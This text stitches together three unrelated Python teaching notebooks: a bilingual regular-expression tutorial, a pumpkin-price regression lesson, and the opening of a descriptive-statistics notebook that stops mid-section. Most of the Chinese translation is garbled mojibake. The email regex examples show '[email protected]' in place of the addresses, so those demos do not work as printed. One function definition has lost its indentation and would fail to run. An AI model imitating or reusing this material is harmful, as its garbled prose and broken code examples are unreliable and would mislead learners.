ๆฌ็ฎๅ็ๅญ็ฌฆๅๆฐๅญ็็ปๅ๏ผ้ฃไนๅฎๅฐๅน้
่ช่บซ๏ผ
```
regex = re.compile('ion')
regex.findall('Great Expectations')
```
#### Some characters have special meanings
#### ็นๆฎๅซไน็ๅญ็ฌฆ
> While simple letters or numbers are direct matches, there are a handful of characters that have special meanings within regular expressions. They are:
```
. ^ $ * + ? { } [ ] \ | ( )
```
> We will discuss the meaning of some of these momentarily.
In the meantime, you should know that if you'd like to match any of these characters directly, you can *escape* them with a back-slash:
ๆฎ้็ๅญ็ฌฆๅๆฐๅญไผ็ดๆฅๅน้
๏ผ็ถๅๆญฃๅ่กจ่พพๅผไธญๅ
ๅซๅพๅค็็นๆฎๅญ็ฌฆ๏ผไปไปฌๆฏ๏ผ
```shell
. ^ $ * + ? { } [ ] \ | ( )
```
ไธไผๆไปฌไผ็จๅพฎ่ฏฆ็ป็ไป็ปๅ
ถไธญ็้จๅใๅๆถ๏ผไฝ ้่ฆ็ฅ้็ๆฏ๏ผๅฆๆไฝ ๅธๆ็ดๆฅๅน้
ไธ่ฟฐ็็นๆฎๅญ็ฌฆ็่ฏ๏ผไฝ ้่ฆไฝฟ็จๅๆๆ `"\"`ๆฅ่ฝฌไนไปไปฌ๏ผ
```
regex = re.compile(r'\$')
regex.findall("the cost is $20")
```
> The ``r`` preface in ``r'\$'`` indicates a *raw string*; in standard Python strings, the backslash is used to indicate special characters.
For example, a tab is indicated by ``"\t"``:
ไธ้ข็ๆญฃๅ่กจ่พพๅผไธญ็ๅ็ผ`r`ๆฏ่ฏดๆๆนๅญ็ฌฆไธฒๆฏไธไธช*ๅๅงๅญ็ฌฆไธฒ*; ๅจๆ ๅ็Pythonๅญ็ฌฆไธฒไธญ๏ผๅๆๆ ็จๆฅ่ฝฌไนๅนถ่กจ็คบไธไธช็นๆฎๅญ็ฌฆใไพๅฆ๏ผๅถ่กจ็ฌฆๅๆๅญ็ฌฆไธฒ็ๅฝขๅผไธบ`"\t"`๏ผ
```
print('a\tb\tc')
```
> Such substitutions are not made in a raw string:
่ฟ็ง่ฝฌไนไธไผๅบ็ฐๅจๅๅงๅญ็ฌฆไธฒไธญ๏ผ
```
print(r'a\tb\tc')
```
> For this reason, whenever you use backslashes in a regular expression, it is good practice to use a raw string.
ๅ ๆญค๏ผๅฝไฝ ้่ฆๅจๆญฃๅ่กจ่พพๅผไธญไฝฟ็จๅๆๆ ๆถ๏ผไฝฟ็จๅๅงๅญ็ฌฆไธฒๆฏไธไธชๅฅฝ็้ๆฉใ
#### Special characters can match character groups
#### ็นๆฎๅญ็ฌฆ่ฝๅน้
ไธ็ปๅญ็ฌฆ
> Just as the ``"\"`` character within regular expressions can escape special characters, turning them into normal characters, it can also be used to give normal characters special meaning.
These special characters match specified groups of characters, and we've seen them before.
In the email address regexp from before, we used the character ``"\w"``, which is a special marker matching *any alphanumeric character*. Similarly, in the simple ``split()`` example, we also saw ``"\s"``, a special marker indicating *any whitespace character*.
ๅฐฑๅๅๆๆ ๅจๆญฃๅ่กจ่พพๅผไธญ่ฝ่ฝฌไน็นๆฎๅญ็ฌฆ้ฃๆ ท๏ผๅๆๆ ไน่ฝๅฐไธไบๆฎ้ๅญ็ฌฆ่ฝฌไนๆ็นๆฎๅญ็ฌฆใ่ฟไบ็นๆฎๅญ็ฌฆ่ฝไปฃ่กจไธ็ปๆไธ็ฑป็ๅญ็ฌฆ็ปๅ๏ผๅฐฑๅๆไปฌๅจๅ้ข็ไพๅญๅฝไธญ็ๅฐ็้ฃๆ ทใๅจ็ตๅญ้ฎไปถๅฐๅ็ๆญฃๅ่กจ่พพๅผไธญ๏ผๆไปฌไฝฟ็จไบๅญ็ฌฆ`"\w"`๏ผ่ฟไธช็นๆฎๅญ็ฌฆไปฃ่กจ็*ๆๆ็ๅญๆฏๆฐๅญ็ฌฆๅท*ใๅๆ ท็๏ผๅจๅ้ข็`split()`ไพๅญไธญ๏ผ`"\s"`ไปฃ่กจ็*ๆๆ็็ฉบ็ฝๅญ็ฌฆ*ใ
> Putting these together, we can create a regular expression that will match *any two letters/digits with whitespace between them*:
ๆ่ฟไธคไธช็นๆฎ็ฌฆๅทๆพๅจไธ่ตท๏ผๆไปฌๅฐฑๅฏไปฅๆ้ ไธไธช*ไปปๆไธคไธชๅญๆฏๆๆฐๅญไน้ดๅซๆไธไธช็ฉบๆ ผ*็ๆญฃๅ่กจ่พพๅผ๏ผ
```
regex = re.compile(r'\w\s\w')
regex.findall('the fox is 9 years old')
```
> This example begins to hint at the power and flexibility of regular expressions.
่ฟไธชไพๅญๅทฒ็ปๅผๅงๅฑ็คบๆญฃๅ่กจ่พพๅผ็ๅ้ๅ็ตๆดปๆงไบใ
> The following table lists a few of these characters that are commonly useful:
> | Character | Description || Character | Description |
|-----------|-----------------------------||-----------|---------------------------------|
| ``"\d"`` | Match any digit || ``"\D"`` | Match any non-digit |
| ``"\s"`` | Match any whitespace || ``"\S"`` | Match any non-whitespace |
| ``"\w"`` | Match any alphanumeric char || ``"\W"`` | Match any non-alphanumeric char |
ไธ่กจๅๅบไบๅธธ็จ็็นๆฎ็ฌฆๅท:
| ็นๆฎ็ฌฆๅท | ๆ่ฟฐ || ็นๆฎ็ฌฆๅท | ๆ่ฟฐ |
|-----------|-----------------------------||-----------|---------------------------------|
| ``"\d"`` | ไปปๆๆฐๅญ || ``"\D"`` | ไปปๆ้ๆฐๅญ |
| ``"\s"`` | ไปปๆ็ฉบ็ฝ็ฌฆๅท || ``"\S"`` | ไปปๆ้็ฉบ็ฝ็ฌฆๅท |
| ``"\w"`` | ไปปๆๅญ็ฌฆๆๆฐๅญ || ``"\W"`` | ไปปๆ้ๅญ็ฌฆๆๆฐๅญ |
> This is *not* a comprehensive list or description; for more details, see Python's [regular expression syntax documentation](https://docs.python.org/3/library/re.html#re-syntax).
่ฟๅผ ่กจๅพไธๅฎๆด๏ผ้่ฆ่ฏฆ็ปๆ่ฟฐ๏ผ่ฏทๅ่ง๏ผ[ๆญฃๅ่กจ่พพๅผ่ฏญๆณๆๆกฃ](https://docs.python.org/3/library/re.html#re-syntax)ใ
#### Square brackets match custom character groups
#### ไธญๆฌๅทๅน้
่ชๅฎไน็ๅญ็ฌฆ็ป
> If the built-in character groups aren't specific enough for you, you can use square brackets to specify any set of characters you're interested in.
For example, the following will match any lower-case vowel:
ๅฆๆๅ
งๅปบ็ๅญ็ฌฆ็ปๅนถไธๆปก่ถณไฝ ็่ฆๆฑ๏ผไฝ ๅฏไปฅไฝฟ็จไธญๆฌๅทๆฅๆๅฎไฝ ้่ฆ็ๅญ็ฌฆ็ปใไพๅฆ๏ผไธไพไธญ็ๆญฃๅ่กจ่พพๅผๅน้
ไปปๆๅฐๅๅ
้ณๅญๆฏ๏ผ
```
regex = re.compile('[aeiou]')
regex.split('consequential')
```
> Similarly, you can use a dash to specify a range: for example, ``"[a-z]"`` will match any lower-case letter, and ``"[1-3]"`` will match any of ``"1"``, ``"2"``, or ``"3"``.
For instance, you may need to extract from a document specific numerical codes that consist of a capital letter followed by a digit. You could do this as follows:
ไฝ ่ฟๅฏไปฅไฝฟ็จๆจช็บฟ`"-"`ๆฅๆๅฎๅญ็ฌฆ็ป็่ๅด๏ผไพๅฆ๏ผ`"[a-z]"`ๅน้
ไปปๆๅฐๅๅญๆฏ๏ผ`"[1-3]"`ๅน้
`"1"`๏ผ`"2"`ๆ`"3"`ใไพๅฆ๏ผไฝ ๅธๆไปๆไธชๆๆกฃไธญๆๅๅบ็นๅฎ็ๆฐๅญไปฃ็ ๏ผ่ฏฅไปฃ็ ็ฑไธไธชๅคงๅๅญๆฏๅ้ข่ทไธไธชๆฐๅญ็ปๆใไฝ ๅฏไปฅ่ฟๆ ทๅ๏ผ
```
regex = re.compile('[A-Z][0-9]')
regex.findall('1043879, G2, H6')
```
#### Wildcards match repeated characters
#### ้้
็ฌฆๅน้
้ๅคๆฌกๆฐ็ๅญ็ฌฆ
> If you would like to match a string with, say, three alphanumeric characters in a row, it is possible to write, for example, ``"\w\w\w"``.
Because this is such a common need, there is a specific syntax to match repetitions โ curly braces with a number:
ๅฆๆไฝ ๆณ่ฆๅน้
ไธไธชๅญ็ฌฆไธฒๅ
ๅซ3ไธชๅญ็ฌฆๆๆฐๅญ๏ผๅฝ็ถไฝ ๅฏไปฅ่ฟๆ ทๅ`"\w\w\w"`ใไฝๆฏๅ ไธบ่ฟไธช้ๆฑๅคชๆฎ้ไบ๏ผๅ ๆญคๆญฃๅ่กจ่พพๅผๅฐๅฎๅๆไบ้ๅคๆฌกๆฐ็่งๅ - ไฝฟ็จ่ฑๆฌๅทไธญ็ๆฐๅญ่กจ็คบ้ๅค็ๆฌกๆฐ๏ผ
```
regex = re.compile(r'\w{3}')
regex.findall('The quick brown fox')
```
> There are also markers available to match any number of repetitions โ for example, the ``"+"`` character will match *one or more* repetitions of what precedes it:
ๅฝ็ถ่ฟๆไธไบๆ ่ฎฐ่ฝๅคๅน้
ไปปๆๆฌกๆฐ็้ๅค - ไพๅฆ๏ผ`"+"`ๅทไปฃ่กจๅ้ขๅน้
ๅฐ็ๅญ็ฌฆ้ๅค*ไธๆฌกๆๅคๆฌก*๏ผ
```
regex = re.compile(r'\w+')
regex.findall('The quick brown fox')
```
> The following is a table of the repetition markers available for use in regular expressions:
> | Character | Description | Example |
|-----------|-------------|---------|
| ``?`` | Match zero or one repetitions of preceding | ``"ab?"`` matches ``"a"`` or ``"ab"`` |
| ``*`` | Match zero or more repetitions of preceding | ``"ab*"`` matches ``"a"``, ``"ab"``, ``"abb"``, ``"abbb"``... |
| ``+`` | Match one or more repetitions of preceding | ``"ab+"`` matches ``"ab"``, ``"abb"``, ``"abbb"``... but not ``"a"`` |
| ``{n}``   | Match ``n`` repetitions of preceding | ``"ab{2}"`` matches ``"abb"`` |
| ``{m,n}`` | Match between ``m`` and ``n`` repetitions of preceding | ``"ab{2,3}"`` matches ``"abb"`` or ``"abbb"`` |
下表列出了正则表达式中可用的重复标记:
| 特殊字符 | 描述 | 例子 |
|-----------|-------------|---------|
| ``?`` | 匹配0次或1次 | ``"ab?"`` 匹配 ``"a"`` 或 ``"ab"`` |
| ``*`` | 匹配0次或多次 | ``"ab*"`` 匹配 ``"a"``, ``"ab"``, ``"abb"``, ``"abbb"``... |
| ``+`` | 匹配1次或多次 | ``"ab+"`` 匹配 ``"ab"``, ``"abb"``, ``"abbb"``... 但不匹配 ``"a"`` |
| ``{n}`` | 匹配正好n次 | ``"ab{2}"`` 匹配 ``"abb"`` |
| ``{m,n}`` | 匹配最少m次、最多n次 | ``"ab{2,3}"`` 匹配 ``"abb"`` 或 ``"abbb"`` |
> With these basics in mind, let's return to our email address matcher:
ไบ่งฃไบไธ่ฟฐๅบ็กๅชๆฏๅ๏ผ่ฎฉๆไปฌๅๅฐๆไปฌ็็ตๅญ้ฎไปถๅฐๅ็ไพๅญ๏ผ
```
email = re.compile(r'\w+@\w+\.[a-z]{3}')
```
> We can now understand what this means: we want one or more alphanumeric character (``"\w+"``) followed by the *at sign* (``"@"``), followed by one or more alphanumeric character (``"\w+"``), followed by a period (``"\."`` โ note the need for a backslash escape), followed by exactly three lower-case letters.
็ฐๅจๆไปฌ่ฝ็่งฃ่ฟไธช่กจ่พพๅผไบ๏ผๆไปฌ้ฆๅ
้่ฆไธไธชๆๅคไธชๅญๆฏๆฐๅญๅญ็ฌฆ`"\w+"`๏ผ็ถๅ้่ฆๅญ็ฌฆ`"@"`๏ผ็ถๅ้่ฆไธไธชๆๅคไธชๅญๆฏๆฐๅญๅญ็ฌฆ`"\w+"`๏ผ็ถๅ้่ฆไธไธช`"\."`๏ผๆณจๆ่ฟ้ไฝฟ็จไบๅๆๆ ๏ผๅ ๆญค่ฟไธช็นๆฒกๆ็นๆฎๅซไน๏ผ๏ผๆๅๆไปฌ้่ฆๆญฃๅฅฝไธไธชๅฐๅๅญๆฏใ
> If we want to now modify this so that the Obama email address matches, we can do so using the square-bracket notation:
ๅฆๆๆไปฌ้่ฆไฟฎๆน่ฟไธชๆญฃๅ่กจ่พพๅผ๏ผ่ฎฉๅฎๅฏไปฅๅน้
ๅฅฅๅทด้ฉฌ็็ตๅญ้ฎไปถๅฐๅ็่ฏ๏ผๆไปฌๅฏไปฅไฝฟ็จไธญๆฌๅทๅๆณ๏ผ
```
email2 = re.compile(r'[\w.]+@\w+\.[a-z]{3}')
email2.findall('[email protected]')
```
> We have changed ``"\w+"`` to ``"[\w.]+"``, so we will match any alphanumeric character *or* a period.
With this more flexible expression, we can match a wider range of email addresses (though still not all โ can you identify other shortcomings of this expression?).
ไธ้ขๆไปฌๅฐ`"\w+"`ๆนๆไบ`"[\w.]+"`๏ผๅ ๆญคๆไปฌๅฏไปฅๅจ่ฟ้ๅน้
ไธไปปๆ็ๅญๆฏๆฐๅญ*ๆ*็นๅทใ็ป่ฟ่ฟไธไฟฎๆนๅ๏ผ่ฟไธๆญฃๅ่กจ่พพๅผ่ฝๅคๅน้
ๆดๅค็็ตๅญ้ฎไปถๅฐๅไบ๏ผ่ฝ็ถ่ฟไธๆฏๅ
จ้จ - ไฝ ่ฝไธพไพ่ฏดๆๅชไบ็ตๅญ้ฎไปถๅฐๅไธ่ฝๅน้
ๅฐๅ๏ผ๏ผ
Translator's note: `"[\w.]+"` does not need to be written as `"[\w\.]+"`, because inside the square brackets of a regular expression every character other than `^`, `-`, `]`, and `\` loses its special meaning.
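Two hypothetical addresses that the current `email2` pattern still misses, as a concrete illustration of those shortcomings:
```
email2.findall('john.doe@my-site.org')   # hyphen in the domain -> no match, returns []
email2.findall('user@python.io')         # two-letter suffix -> no match, returns []
```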
#### Parentheses indicate *groups* to extract
#### ไฝฟ็จๅฐๆฌๅท่ฟ่กๅ็ปๅน้
> For compound regular expressions like our email matcher, we often want to extract their components rather than the full match. This can be done using parentheses to *group* the results:
ๅฏนไบๅไธ้ข็็ตๅญ้ฎไปถๅฐๅๅน้
้ฃๆ ทๅคๆ็ๆญฃๅ่กจ่พพๅผๆฅ่ฏด๏ผๆไปฌ้ๅธธๅธๆๆๅไปไปฌ็้จๅๅ
ๅฎน่้ๅฎๅ
จๅน้
ใ่ฟๅฏไปฅไฝฟ็จๅฐๆฌๅท่ฟ่กๅ็ปๅน้
ๆฅๅฎๆ๏ผ
```
email3 = re.compile(r'([\w.]+)@(\w+)\.([a-z]{3})')
text = "To email Guido, try [email protected] or the older address [email protected]."
email3.findall(text)
```
> As we see, this grouping actually extracts a list of the sub-components of the email address.
ๆญฃๅฆ็ปๆๆ็คบ๏ผ่ฟไธชๅ็ปๅ็ๆญฃๅ่กจ่พพๅผๅฐ็ตๅญ้ฎไปถๅฐๅ็ๅไธช้จๅๅๅซๆๅไบๅบๆฅใ
> We can go a bit further and *name* the extracted components using the ``"(?P<name> )"`` syntax, in which case the groups can be extracted as a Python dictionary:
ๆด่ฟไธๆญฅ๏ผๆไปฌๅฏไปฅ็ปๆๅๅบๆฅ็ๅไธช้จๅ*ๅฝๅ*๏ผ่ฟๅฏไปฅ้่ฟไฝฟ็จ`"(?P<name>)"`็่ฏญๆณๅฎ็ฐ๏ผๅจ่ฟ็งๆ
ๅตไธ๏ผๅน้
็ๅ็ปๅฐไผๆๅๅฐPython็ๅญๅ
ธ็ปๆๅฝไธญ๏ผ
```
email4 = re.compile(r'(?P<user>[\w.]+)@(?P<domain>\w+)\.(?P<suffix>[a-z]{3})')
match = email4.match('[email protected]')
match.groupdict()
```
> Combining these ideas (as well as some of the powerful regexp syntax that we have not covered here) allows you to flexibly and quickly extract information from strings in Python.
ๆไธ่ฟฐ็ฅ่ฏ็ปๅ่ตทๆฅ๏ผๅ ไธ่ฟๆๅพๅคๆไปฌๆฒกๆไป็ป็ๅพๅผบๅคง็ๆญฃๅ่กจ่พพๅผ่ฏญๆณๅ่ฝ๏ผ่ฝ่ฎฉไฝ ่ฟ
้็ตๆดปๅฐไปๅญ็ฌฆไธฒไธญๆๅไฟกๆฏใ
### Further Resources on Regular Expressions
### ๆญฃๅ่กจ่พพๅผๆๅฑ้
่ฏป
> The above discussion is just a quick (and far from complete) treatment of this large topic.
If you'd like to learn more, I recommend the following resources:
> - [Python's ``re`` package Documentation](https://docs.python.org/3/library/re.html): I find that I promptly forget how to use regular expressions just about every time I use them. Now that I have the basics down, I have found this page to be an incredibly valuable resource to recall what each specific character or sequence means within a regular expression.
> - [Python's official regular expression HOWTO](https://docs.python.org/3/howto/regex.html): a more narrative approach to regular expressions in Python.
> - [Mastering Regular Expressions (O'Reilly, 2006)](http://shop.oreilly.com/product/9780596528126.do) is a 500+ page book on the subject. If you want a really complete treatment of this topic, this is the resource for you.
ไธ้ขๅฏนไบๆญฃๅ่กจ่พพๅผ็ไป็ปๅชๆฏไธไธชๅฟซ้็ๅ
ฅ้จ๏ผ่ฟ่ฟๆช่พพๅฐๅฎๆด็ไป็ป๏ผใๅฆๆไฝ ๅธๆๅญฆไน ๆดๅค็ๅ
ๅฎน๏ผไธ้ขๆฏไฝ่
ๆจ่็ไธไบ่ตๆบ๏ผ
- [Python็`re`ๆจกๅๆๆกฃ](https://docs.python.org/3/library/re.html): ๆฏๆฌกไฝ่
ๅฟ่ฎฐไบๅฆไฝไฝฟ็จๆญฃๅ่กจ่พพๅผๆถ้ฝไผๅปๆต่งๅฎใ
- [Pythonๅฎๆนๆญฃๅ่กจ่พพๅผHOWTO](https://docs.python.org/3/howto/regex.html): ๅฏนไบPythonๆญฃๅ่กจ่พพๅผๆดๅ ่ฏฆๅฐฝไป็ปใ
- [ๆๆกๆญฃๅ่กจ่พพๅผ(OReilly, 2006)](http://shop.oreilly.com/product/9780596528126.do) ๆฏไธๆฌ500ๅค้กต็ๆญฃๅ่กจ่พพๅผ็ไนฆ็ฑ๏ผไฝ ๅฆๆ้่ฆๅฎๅ
จไบ่งฃๆญฃๅ่กจ่พพๅผ็ๆนๆน้ข้ข๏ผ่ฟๆฏไธไธชไธ้็้ๆฉใ
> For some examples of string manipulation and regular expressions in action at a larger scale, see [Pandas: Labeled Column-oriented Data](15-Preview-of-Data-Science-Tools.ipynb#Pandas:-Labeled-Column-oriented-Data), where we look at applying these sorts of expressions across *tables* of string data within the Pandas package.
ๅฆๆ้่ฆๅญฆไน ๆดๅคๆๅ
ณๅญ็ฌฆไธฒๆไฝๅๆญฃๅ่กจ่พพๅผไฝฟ็จ็ไพๅญ๏ผๅฏไปฅๅ่ง[Pandas: ๆ ็ญพๅ็ๅๆฐๆฎ](15-Preview-of-Data-Science-Tools.ipynb#Pandas:-Labeled-Column-oriented-Data)๏ผ้ฃ้ๆไปฌไผๅฏนPandasไธ็่กจ็ถๆฐๆฎ่ฟ่กๅญ็ฌฆไธฒ็ๅค็ๅๆญฃๅ่กจ่พพๅผ็ๅบ็จใ
## Linear and Polynomial Regression for Pumpkin Pricing - Lesson 3
Load up required libraries and dataset. Convert the data to a dataframe containing a subset of the data:
- Only get pumpkins priced by the bushel
- Convert the date to a month
- Calculate the price to be an average of high and low prices
- Convert the price to reflect the pricing by bushel quantity
```
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
pumpkins = pd.read_csv('../../data/US-pumpkins.csv')
pumpkins.head()
from sklearn.preprocessing import LabelEncoder
pumpkins = pumpkins[pumpkins['Package'].str.contains('bushel', case=True, regex=True)]
new_columns = ['Package', 'Variety', 'City Name', 'Month', 'Low Price', 'High Price', 'Date']
pumpkins = pumpkins.drop([c for c in pumpkins.columns if c not in new_columns], axis=1)
price = (pumpkins['Low Price'] + pumpkins['High Price']) / 2
month = pd.DatetimeIndex(pumpkins['Date']).month
new_pumpkins = pd.DataFrame({'Month': month, 'Variety': pumpkins['Variety'], 'City': pumpkins['City Name'], 'Package': pumpkins['Package'], 'Low Price': pumpkins['Low Price'],'High Price': pumpkins['High Price'], 'Price': price})
new_pumpkins.loc[new_pumpkins['Package'].str.contains('1 1/9'), 'Price'] = price/1.1
new_pumpkins.loc[new_pumpkins['Package'].str.contains('1/2'), 'Price'] = price*2
new_pumpkins.iloc[:, 0:-1] = new_pumpkins.iloc[:, 0:-1].apply(LabelEncoder().fit_transform)
new_pumpkins.head()
```
A scatterplot reminds us that we only have month data from August through December. We probably need more data to be able to draw conclusions in a linear fashion.
```
import matplotlib.pyplot as plt
plt.scatter('Month','Price',data=new_pumpkins)
```
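To confirm which calendar months are actually present (a quick illustrative check using the `month` series computed above, before the label encoding):
```
# Count how many rows fall in each calendar month of the raw dates
pd.Series(month).value_counts().sort_index()
```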
Try some different correlations
```
print(new_pumpkins['City'].corr(new_pumpkins['Price']))
print(new_pumpkins['Package'].corr(new_pumpkins['Price']))
```
Drop rows with missing values and inspect the cleaned dataframe
```
new_pumpkins.dropna(inplace=True)
new_pumpkins.info()
```
Create a new dataframe
```
new_columns = ['Package', 'Price']
lin_pumpkins = new_pumpkins.drop([c for c in new_pumpkins.columns if c not in new_columns], axis='columns')
lin_pumpkins
```
Set X and y arrays to correspond to Package and Price
```
X = lin_pumpkins.values[:, :1]
y = lin_pumpkins.values[:, 1:2]
from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score, mean_squared_error, mean_absolute_error
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
lin_reg = LinearRegression()
lin_reg.fit(X_train,y_train)
pred = lin_reg.predict(X_test)
accuracy_score = lin_reg.score(X_train,y_train)  # R^2 (coefficient of determination) on the training split
print('Model Accuracy: ', accuracy_score)
plt.scatter(X_test, y_test, color='black')
plt.plot(X_test, pred, color='blue', linewidth=3)
plt.xlabel('Package')
plt.ylabel('Price')
plt.show()
lin_reg.predict( np.array([ [2.75] ]) )
new_columns = ['Variety', 'Package', 'City', 'Month', 'Price']
poly_pumpkins = new_pumpkins.drop([c for c in new_pumpkins.columns if c not in new_columns], axis='columns')
poly_pumpkins
corr = poly_pumpkins.corr()
corr.style.background_gradient(cmap='coolwarm')
```
Select the Package/Price columns
```
X=poly_pumpkins.iloc[:,3:4].values
y=poly_pumpkins.iloc[:,4:5].values
```
Create Polynomial Regression model
```
from sklearn.preprocessing import PolynomialFeatures
from sklearn.pipeline import make_pipeline
pipeline = make_pipeline(PolynomialFeatures(4), LinearRegression())
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
pipeline.fit(np.array(X_train), y_train)
y_pred=pipeline.predict(X_test)
df = pd.DataFrame({'x': X_test[:,0], 'y': y_pred[:,0]})
df.sort_values(by='x',inplace = True)
points = pd.DataFrame(df).to_numpy()
plt.plot(points[:, 0], points[:, 1],color="blue", linewidth=3)
plt.xlabel('Package')
plt.ylabel('Price')
plt.scatter(X,y, color="black")
plt.show()
accuracy_score = pipeline.score(X_train,y_train)  # R^2 on the training split
print('Model Accuracy: ', accuracy_score)
pipeline.predict( np.array([ [2.75] ]) )
```
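The scores printed above are computed on the training split; as a complementary, illustrative check, the held-out test split can be scored with the metrics that were already imported:
```
print('Test R2: ', r2_score(y_test, y_pred))
print('Test MAE:', mean_absolute_error(y_test, y_pred))
```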
# **Jupyter Notebook to demonstrate the basics of Descriptive Statistics**
Welcome to the notebook on descriptive statistics. Statistics is a very large field. People even go to grad school for it. For our site here, we will focus on some of the big hitters in statistics that make you a good data scientist.
Descriptive statistics are measurements that describe a population (or sample of that population) of values. They tell you where the center tends to be, how spread out the values are, the shape of the distribution, and a bunch of other things.
But here we focus on some of the simpler values that you have to know to consider yourself a newbie in data science.
The git repository for this notebook (and all notebooks) is found [here](https://github.com/eds-admin/eds-blog/blob/master/Statistics/Descriptive%20Statistics.ipynb).
### Useful resources:
* [Online Stat Book](http://onlinestatbook.com/)
* [Free books to learn Statistics](https://www.kdnuggets.com/2020/12/5-free-books-learn-statistics-data-science.html)
---
Author:
* dr.daniel benninger
History:
* v1, January 2022, dbe --- initial version for CAS BIA12
<h1>Table of Contents<span class="tocSkip"></span></h1>
<div class="toc"><ul class="toc-item"><li><span><a href="#Descriptive-Statistics" data-toc-modified-id="Descriptive-Statistics-1">Descriptive Statistics</a></span><ul class="toc-item"><li><span><a href="#Requirements" data-toc-modified-id="Requirements-1.1">Requirements</a></span></li><li><span><a href="#Useful-Python-functions" data-toc-modified-id="Useful-Python-functions-1.2">Useful Python functions</a></span><ul class="toc-item"><li><span><a href="#Random" data-toc-modified-id="Random-1.2.1">Random</a></span></li><li><span><a href="#len()-&-sum()" data-toc-modified-id="len()-&-sum()-1.2.2"><code>len()</code> & <code>sum()</code></a></span></li><li><span><a href="#max()-&-min()" data-toc-modified-id="max()-&-min()-1.2.3"><code>max()</code> & <code>min()</code></a></span></li><li><span><a href="#sorted()" data-toc-modified-id="sorted()-1.2.4"><code>sorted()</code></a></span></li></ul></li><li><span><a href="#The-Mean" data-toc-modified-id="The-Mean-1.3">The Mean</a></span><ul class="toc-item"><li><span><a href="#1.-Arithmetic-mean" data-toc-modified-id="1.-Arithmetic-mean-1.3.1">1. Arithmetic mean</a></span></li><li><span><a href="#2.-Geometric-mean" data-toc-modified-id="2.-Geometric-mean-1.3.2">2. Geometric mean</a></span></li><li><span><a href="#3.-Harmonic-mean" data-toc-modified-id="3.-Harmonic-mean-1.3.3">3. Harmonic mean</a></span></li></ul></li><li><span><a href="#The-Median" data-toc-modified-id="The-Median-1.4">The Median</a></span></li><li><span><a href="#The-Mode" data-toc-modified-id="The-Mode-1.5">The Mode</a></span></li><li><span><a href="#Percentiles" data-toc-modified-id="Percentiles-1.6">Percentiles</a></span></li><li><span><a href="#The-Boxplot" data-toc-modified-id="The-Boxplot-1.7">The Boxplot</a></span></li><li><span><a href="#Histogram" data-toc-modified-id="Histogram-1.8">Histogram</a></span></li><li><span><a href="#Variability" data-toc-modified-id="Variability-1.9">Variability</a></span><ul class="toc-item"><li><span><a href="#1.-Range" data-toc-modified-id="1.-Range-1.9.1">1. Range</a></span></li><li><span><a href="#2.-Inter-Quartile-Range" data-toc-modified-id="2.-Inter-Quartile-Range-1.9.2">2. Inter-Quartile Range</a></span></li><li><span><a href="#3.-Variance" data-toc-modified-id="3.-Variance-1.9.3">3. Variance</a></span></li></ul></li><li><span><a href="#Next-time" data-toc-modified-id="Next-time-1.10">Next time</a></span></li></ul></div>
## Requirements
We'll use two 3rd party Python libraries (*seaborn* and *pandas*) for displaying graphs.
Run the following cell (the `!` prefix hands the install commands to the shell; the remaining lines are ordinary notebook code):
```
!pip install seaborn;
!pip install pandas
import seaborn as sns
import random as random
%matplotlib inline
```
## Useful Python functions
Many statistics require knowing the length or sum of your data. Let's chug through some useful [built-in functions](https://docs.python.org/3/library/functions.html).
### Random
We'll use the [`random` module](https://docs.python.org/3/library/random.html) a lot to generate random numbers to make fake datasets. The plain vanilla random generator will pull from a uniform distribution. There are also options to pull from other distributions. As we add more tools to our data science toolbox, we'll find that [NumPy's](https://docs.scipy.org/doc/numpy-1.13.0/index.html) random number generators are more full-featured and play really nicely with [Pandas](https://pandas.pydata.org/), another key data science library. For now, we're going to avoid the overhead of learning another library and just use Python's standard library.
```
random.seed(42)
values = [random.randrange(1,1001,1) for _ in range(10000)]
values[0:15]
```
### `len()` & `sum()`
The building blocks of average. Self explanatory here.
```
len(values)
sum(values)
```
Below we'll use Seaborn to plot and visualize some of our data. Don't worry about this too much. Visualization, while important, is not the focus of this notebook.
See the *DEMO_SEABORN_Visualization_Examples.ipynb* notebook for a specific discussion of data visualization
```
sns.stripplot(x=values, jitter=True, alpha=0.2)
```
This graph is pretty cluttered. That makes sense because it's 10,000 values between 1 and 1,000. That tells us there should be an average of 10 entries for each value.
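A quick, illustrative way to check that claim is to count occurrences per distinct value:
```
# Average number of occurrences per distinct value; should be close to 10
from collections import Counter
counts = Counter(values)
len(values) / len(counts)
```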
Let's make a sparse number line with just 200 values between 1 and 1000. There should be a lot more white space.
```
sparse_values = [random.randrange(1,1001) for _ in range (200)]
sns.stripplot(x=sparse_values, jitter=True)
```
### `max()` & `min()`
These built-in functions are useful for getting the range of our data, and just general inspection:
```
print("Max value: {}\nMin value: {}".format(
max(values), min(values)))
```
### `sorted()`
Another very important technique in wrangling data is sorting it. If we have a dataset of salaries, for example, and we want to see the 10 top earners, this is how we'd do it. Let's look now at the first 20 items in our sorted data set:
```
sorted_vals = sorted(values)
sorted_vals[0:20]
```
If we wanted to sort values in-place (that is, get the same end result as `values = sorted(values)` without creating a new list), we would use the `list` class' own `sort()` method:
```python
values.sort()
```
## The Mean
The mean is a fancy statistical way to say "average." You're all familiar with what average means. But mathematicians like to be special and specific. There's not just one type of mean. In fact, we'll talk about 3 kinds of "means" that are all useful for different types of numbers.
1. **Arithmetic mean** for common numbers
2. **Geometric mean** for returns or growth
3. **Harmonic mean** for ratios and rates
### 1. Arithmetic mean
This is your typical average. You've used it all your life. It's simply the sum of the elements divided by the length. Intuitively, think of it as if you made every element the exact same value so that the sum of all values remains the same as before. What would that value be?
Mathematically the mean, denoted $\mu$, looks like:
$$\mu = \frac{x_1 + x_2 + \cdots + x_n}{n}$$
where $\mu$ is our mean, $x_i$ is a value at the $i$th index of our list, and $n$ is the length of that list.
In Python, it's a simple operation combining two builtins we saw above: `sum()` and `len()`
```
def arithmetic_mean(vals):
return sum(vals) / len(vals)
arithmetic_mean(values)
```
From this we see our average value is 502.1696. Let's double check that with our intuitive definition using the sum:
```
avg_sum = len(values) * arithmetic_mean(values) #10,000 * 502.1696
print("{} =? {}".format(sum(values), avg_sum))
```
### 2. Geometric mean
The geometric mean is a similar idea but instead uses the product. It says if I multiply each value in our list together, what one value could I use instead to get the same result?
The geometric mean is very useful for things like growth or returns (e.g. stocks) because returns compound; simply adding them doesn't give the total return over a longer period. In other words, if I have a stock growing at 5% per year, what will be the total return after 5 years?
